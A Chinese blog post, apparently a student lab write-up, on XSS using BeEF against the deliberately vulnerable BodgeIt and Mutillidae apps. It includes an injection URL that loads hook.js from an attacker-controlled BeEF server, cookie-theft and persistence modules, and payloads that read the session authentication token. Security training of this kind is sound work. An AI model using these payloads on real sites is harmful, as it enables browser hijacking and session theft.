web使用跨站脚本攻击客户端

已于 2023-11-17 11:54:41 修改
阅读量44 收藏
点赞数
文章标签: 前端
于 2023-11-13 16:02:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A33479/article/details/134378578
版权

目录

一、利用BeEF执行XSS攻击

 1.在Kali Linux中可以使用多种方法启动BeEF工具: 

         1.1在终端执行beef-xss命令启动BeEF。

1.2安装beef-xss

​1.3修改配置文件/etc/beef-xss/config.yaml

2.卸载beef

2.1重新安装ruby和 beef

2.3从安装 BeEF的目录下启动.

3.实战演练

3.1想象你是受害者(如Win7主机),你收到了一封包含XSS链接的电子邮件(或网页),若你点击它,访问了该链接:

​3.2现在,在BeEF面板中,攻击者将看到一个浏览器上线:

3.3进入模块目录,转到浏览器中的 Persistence | Man-In-The-Browser,然后单击Execute执行它。

​3.4模块执行后,在模块的历史记录中选择相关命令

3.5攻击者还可以使用BeEF在受害者浏览器中执行命令。

二、Web存储中提取信息

1.打开开发人员工具,转到Storage(存储)选项卡,再转到Local Storage(本地存储)并选择服务器地址(192.168.132.128) :

2.切换到Session Storage(会话存储)并选择服务器地址:

3.在同一浏览器上,打开一个新选项卡,然后转到Bodgelt (http://192.168.56.11/bodgeit/) 。

4.我们知道Bodgelt的搜索易受XSS 攻击,因此输入以下有效载荷,在搜索框中执行它:

5.现在,尝试使用会话存储:

6.返回 Mutillidael 选项卡并转至OWASP2013 | XSS | Reflected(First Order)(反映的第一顺序) | DNS Lookup(DNS查找)。

一、利用BeEF执行XSS攻击


 BeEF,全称The Browser Exploitation Framework(浏览器攻击框架),是一款针对web浏览器的渗透测试工具。
 在这个小节中,我们将演示利用XSS漏洞和 BeEF框架控制目标浏览器。
 环境准备
 在开始之前,我们需要确保已经启动了BeEF服务,默认管理页面的url 是:http://127.0.0.1:3000/ui/panel(默认账号和密码为beef /beef)。


 1.在Kali Linux中可以使用多种方法启动BeEF工具:
 1.1在终端执行beef-xss命令启动BeEF。

apt install beef

1.2安装beef-xss

apt install beef-xss

1.3修改配置文件/etc/beef-xss/config.yaml

 

注意1:启动BeEF之前确保apache2已经启动( systemctl restart apache2)﹔新版BeEF需要在启动时修改默认账号密码,或在配置文件"/etc/beef-xss/config.yaml"修改默认账号密码。
注意2:如果启动 BeEF报错,建议按下面步骤重新安装beef-xss


2卸载beef

#apt remove beef-xss

2.1重新安装ruby和 beef

#apt update
#apt install ruby
#apt install ruby-dev libpcap-dev#gem install eventmachine
#apt install beef-xss

2.3从安装 BeEF的目录下启动,如下图所示。

3.实战演练


BeEF需要目标浏览器调用hook.js文件,它能让浏览器挂钩到我们的BeEF服务器,另外我们将利用一个易受XSS攻击的应用程序,让目标用户调用它:


3.1想象你是受害者(如Win7主机),你收到了一封包含XSS链接的电子邮件(或网页),若你点击它,访问了该链接:

http://192.168.132.129/bodgeitl/search.jsp?q=<script src="http:!/192.168.132.128:3000/hook.js"></script>


3.2现在,在BeEF面板中,攻击者将看到一个浏览器上线:

3.3在浏览器被hook.js文件挂钩之后,目标用户在被域中导航攻击时,攻击者最好要让会话变为持久性的。下一步转到攻击者浏览器中的Commands选项卡,进入模块目录,转到浏览器中的 Persistence | Man-In-The-Browser,然后单击Execute执行它。

Persistence | Man-In-The-Browser


3.4模块执行后,在模块的历史记录中选择相关命令,检查结果如下:

3.5攻击者还可以使用BeEF在受害者浏览器中执行命令。例如,在模块目录中,到Browserl Get Cookie,点击Execute来获取用户的Cookie:

Browserl Get Cookie

二、Web存储中提取信息


在 HTML5之前,Web应用程序在用户计算机中持久或基于会话存储信息的唯一方法是通过cookie。在这个新版本的语言中,增加了新的存储选项,称为Web存储,即本地存储和会话存储。这些允许应用程序使用JavaScript 从客户端(浏览器)存储和检索信息,并且在本地存储的情况下或在会话存储的情况下保留此信息直到显式删除,直到保存它的选项卡或窗口关闭为止。
在本文中,我们将使用XSS漏洞从浏览器的Web存储中检索信息,表明如果应用程序容易受到攻击,攻击者可以轻松地利用这些信息。

环境准备
我们将再次使用Mutillidae II及其HTML5网络存储练习来完成此实验。以下是步骤:1.在Kali主机中,浏览Mutillidae ll ( http:/192.168.132.128/mutillidae)并在菜单中转到HTML5 |HTML5 Web Storage(存储)|HTML 5 Storage

http:/192.168.132.128/mutillidae

HTML5 |HTML5 Web Storage(存储)|HTML 5 Storage


1.打开开发人员工具,转到Storage(存储)选项卡,再转到Local Storage(本地存储)并选择服务器地址(192.168.132.128) :

2.在这里,我们可以看到Local Storage(本地存储)中有三个值。3.现在,切换到Session Storage(会话存储)并选择服务器地址:

在临时或每会话存储中,我们看到四个值,其中一个称为Secure.AuthenticationToken


3.我们之前提到可以基于每个域访问本地存储,这意味着在同一个域中运行的任何应用程序都可以读取和操作,例如,我们在步骤﹖中看到的 MessageOfTheDay条目。让我们尝试利用另一个漏洞应用程序来访问此数据。在同一浏览器上,打开一个新选项卡,然后转到
Bodgelt (http://192.168.56.11/bodgeit/) 。

Bodgelt (http://192.168.56.11/bodgeit/) 。


4.我们知道Bodgelt的搜索易受XSS 攻击,因此输入以下有效载荷,在搜索框中执行它:
<script>alert(window.localStorage.MessageOfTheDay);</script>

<script>alert(window.localStorage.MessageOfTheDay);</script>

 

5.现在,尝试使用会话存储:


<script>alert(window.sessionStorage.getItem("Secure.AuthenticationToken"));</script>

<script>alert(window.sessionStorage.getItem("Secure.AuthenticationToken"));</script>


6.由于我们无法从其他窗口访问会话存储,请返回 Mutillidael 选项卡并转至OWASP2013 | XSS | Reflected(First Order)(反映的第一顺序) | DNS Lookup(DNS查找)。

OWASP2013 | XSS | Reflected(First Order)(反映的第一顺序) | DNS Lookup(DNS查找)。


7.在"Hostname/IP"字段中,输入前面的有效内容并单击"Look DNS"(查找DNS)按钮:

2022级计网一班韦思颖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java反射行跨站脚本攻击_Web安全之防止XSS跨站脚本攻击
weixin_32589453的博客
02-24 1041
XSS攻击全称跨站脚本攻击(Cross-site scripting),为和CSS区别,改为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意的web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。XSS攻击的产生原因是对外部输入的参数没有做严格过滤,导致输入参数直接参与页面源代码,相当于页面源代码可以被外部修改,因此可能被改变页面结构、植...
java 跨站脚本攻击_XSS(跨站脚本攻击)漏洞解决方案
weixin_33979216的博客
02-21 1951
首先,简单介绍一下XSS定义:一 、 XSS介绍XSS是跨站脚本攻击(Cross Site Scripting)的缩写。为了和层叠样式表CSS(Cascading Style Sheets)加以区分,因此将跨站脚本攻击缩写为XSS。XSS是因为有些恶意攻击者往Web页面中插入恶意Script代码,当用户浏览该页面时,嵌入的Script代码将会被执行,从而达到恶意攻击用户的特殊目的。二、XSS攻击目...
网络安全威胁——跨站脚本攻击
聚集机器学习、信息安全
12-03 2603
跨站脚本攻击(Cross-site Scripting,通常称为XSS),是一种典型的Web程序漏洞利用攻击,在线论坛、博客、留言板等共享平台是跨站脚本攻击的典型目标。
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 2854
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
XSS(跨站脚本攻击)攻击与防御
zhaohong_bo的专栏
05-21 1066
一、 XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户...
跨站脚本攻击(XSS)
weixin_44558065的博客
07-08 7734
XSS攻击 概念:XSS攻击是指攻击者利用网站程序对用户输入过滤不足的缺陷,输入可以显示在页面上或者对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 实质:跨站脚本攻击本质上是一种将恶意脚本嵌入到当前页面中并执行的攻击方式。通常黑客通过“HTML注入”行为篡改网页,并插入恶意JavaScript(JS)脚本,从而在用户浏览网页时控制浏览器的行为。 产生原因:网站对用户提交的数据过滤不严格,导致用户提交的数据可以修改当前页面或者插入一段脚本。
WEB漏洞篇——跨站脚本攻击(XSS)
m0_56634355的博客
06-05 4605
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
Web安全】跨站脚本攻击XSS
RexHa的博客
09-04 816
跨站脚本攻击(XSS),通常指黑客通过HTML注入在网页中插入了恶意脚本,在用户浏览网页时,控制用户浏览器的一种攻击。XSS可以分为以下几类:1、反射型XSS又叫非持久型XSS,黑客需要诱导用户“点击”一个恶意链接,才能攻击成功。2、存储型XSS又叫持久型XSS,恶意代码存储在服务器中,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行。从效果上来说也属于反射型XSS,是通过修改页面的DOM节点形成的XSS。
XSS跨站脚本攻击
金色%夕阳的博客
04-13 4773
XSS跨站脚本攻击 1. 引入 炸诈骗短信-----利用的是人性的弱点构造的恶意链接 人性的弱点----贪婪 恶意链接之后后会进行跳转,从而导致数据的丢失 2. XSS注入漏洞的简介 1. 什么是XSS漏洞 英文全称:Cross Site Scripting.层叠样式表CSS,层叠样式表出现在XSS漏洞之前,为了避免混淆所以改名为XSS 中文名称:跨站脚本攻击、XSS注入漏洞 2. 如何进行攻击呢 恶意攻击者向web前端插入恶意的前端代码(核心是javascript代码),当用户浏览该网页 时,嵌入其中
XSS跨站脚本攻击(基础详解)
cike_y
01-10 2403
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
基于决策树分类的跨站脚本攻击检测方法
10-17
跨站脚本攻击是一种特殊的Web客户端脚本注入攻击手段,目前对于跨站脚本攻击缺乏有效的防御措施。针对这一问题,提出一种采用决策树分类算法检测跨站脚本攻击的方法,该方法将Web应用程序中容易受到跨站脚本攻击的...
xss跨站攻击
09-25
在2007年OWASP所统计的所有安全威胁中,跨站脚本攻击占到了22%,高居所有Web威胁之首。 XSS攻击的危害包括 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、...
XSS跨站脚本gj剖析与防御.pdf
05-13
《XSS跨站脚本攻击剖析与防御》,完整版本。作者:邱永华,出版社:人民邮电出版社,ISBN:9787115311047,PDF 格式,扫描版,大小 67MB。本资源带有PDF书签,方便读者朋友阅读。 内容简介: 《XSS跨站脚本攻击剖析...
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
山花的博客
05-30 324
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
记录一次前端页面崩溃的产生及处理
最新发布
weixin_51123079的博客
05-30 407
记录一次前端页面崩溃的产生及处理
web前端三大主流框架
低调做人,低调编码,神码都是浮云
05-30 875
Web前端三大主流框架介绍:Angular、React、Vue
【JS实战案例汇总——不定时更新版】
微木
05-30 213
练习JS的实用案例
跨站脚本攻击(XSS)与SQL注入攻击的异同
06-13
跨站脚本攻击(XSS)和SQL注入攻击是两种常见的Web安全漏洞,它们都是利用了应用程序的漏洞来进行攻击。它们的异同如下: 相同点: 1. 都是Web应用程序常见的安全漏洞。 2. 都可以导致应用程序崩溃、数据泄露、被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值